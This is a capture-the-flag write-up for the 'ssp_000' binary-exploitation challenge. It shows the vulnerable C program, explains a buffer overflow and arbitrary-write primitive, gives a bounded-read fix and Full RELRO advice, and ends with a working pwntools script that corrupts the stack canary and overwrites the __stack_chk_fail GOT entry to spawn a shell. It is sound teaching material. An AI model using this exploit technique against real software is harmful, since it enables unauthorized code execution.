Write-up of the challenge “Ssp_000”
This challenge is part of the “Binary exploitation” category and is in Level 1.
Goal of the challenge
The objective of this challenge is to overflow the buffer and overwrite the saved RIP so that it points to get_shell. The binary helps us: it first lets us write into the buffer we want to overflow, and then lets us write a value of our choice to an address of our choice.
Program structure
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>

void alarm_handler() {
    puts("TIME OUT");
    exit(-1);
}

void initialize() {
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);
    signal(SIGALRM, alarm_handler);
    alarm(30);
}

void get_shell() {
    system("/bin/sh");
}

int main(int argc, char *argv[]) {
    long addr;
    long value;
    char buf[0x40] = {};
    initialize();
    read(0, buf, 0x80);
    printf("Addr : ");
    scanf("%ld", &addr);
    printf("Value : ");
    scanf("%ld", &value);
    *(long *)addr = value;
    return 0;
}
Security breach
The vulnerability here is:
read(0, buf, 0x80);
It is a basic buffer overflow: buf is only 0x40 bytes, but up to 0x80 bytes are read into it, so the second half of the input runs past the buffer over the stack canary and the saved return address. The line *(long *)addr = value; then gives an arbitrary 8-byte write to any address we enter.
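As an added example (not the challenge binary), this is the same 0x40-byte buffer read with the length bounded to the buffer size, which is the fix for the overflow above. The helper bounded_read and the demo function demo_overlong_input are assumptions of this example; the demo pushes the 0x80 bytes the vulnerable read would accept through a pipe (constructed input) and shows that only 0x3f of them are stored, so the canary and saved RIP are never touched.

```c
/* Added example, not the ssp_000 source: a bounded replacement for
 * read(0, buf, 0x80) into a 0x40-byte buffer. */
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define BUF_SIZE 0x40   /* same buffer size as the challenge binary */

/* Read at most bufsz - 1 bytes from fd into buf and NUL-terminate it.
 * Returns the number of bytes stored, or -1 on error. */
ssize_t bounded_read(int fd, char *buf, size_t bufsz)
{
    if (bufsz == 0)
        return -1;
    ssize_t n = read(fd, buf, bufsz - 1);
    if (n < 0)
        return -1;
    buf[n] = '\0';
    return n;
}

/* Constructed input: 0x80 bytes of 'A', the length the vulnerable read
 * accepts. Returns how many bytes the hardened read stored (0x3f), or -1. */
ssize_t demo_overlong_input(void)
{
    int fds[2];
    if (pipe(fds) != 0)
        return -1;

    char input[0x80];
    memset(input, 'A', sizeof(input));
    if (write(fds[1], input, sizeof(input)) != (ssize_t)sizeof(input)) {
        close(fds[0]);
        close(fds[1]);
        return -1;
    }
    close(fds[1]);

    char buf[BUF_SIZE] = {0};
    ssize_t n = bounded_read(fds[0], buf, sizeof(buf));
    close(fds[0]);

    /* The stored string is exactly n bytes long: nothing spilled past buf. */
    if (n >= 0 && (size_t)n != strlen(buf))
        return -1;
    return n;
}

int main(void)
{
    ssize_t n = demo_overlong_input();
    printf("stored %zd of 0x80 input bytes into a 0x%x-byte buffer\n", n, BUF_SIZE);
    return n == BUF_SIZE - 1 ? 0 : 1;
}
```

The bounded read removes the first half of the chain; the second half, overwriting the GOT entry of __stack_chk_fail, only works while the GOT is writable, and linking with Full RELRO (-Wl,-z,relro,-z,now) makes it read-only once the binary is loaded.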
Solution
So my idea is to overflow the buffer with our first input so that the canary gets corrupted and the canary check fails. After that we use the arbitrary write to change the GOT entry of the function that is called when the canary check fails (__stack_chk_fail) so that it points to get_shell. While researching which function is called when the canary gets corrupted, this post helped a lot: https://sigma-star.at/blog/2023/05/stack-canary/
solve.py:
from pwn import *

p = remote('host8.dreamhack.games', 12517)
# p = process('./ssp_000')
elf = ELF('./ssp_000')

get_shell = elf.sym['get_shell']
canary = elf.got['__stack_chk_fail']   # GOT entry of the canary-failure handler

# First input: 120 bytes, enough to run past buf and corrupt the canary
payload = b"A" * 120
p.send(payload)

# Arbitrary write: point __stack_chk_fail's GOT entry at get_shell
p.sendlineafter(b'Addr : ', str(canary).encode())
p.sendlineafter(b'Value : ', str(get_shell).encode())
p.interactive()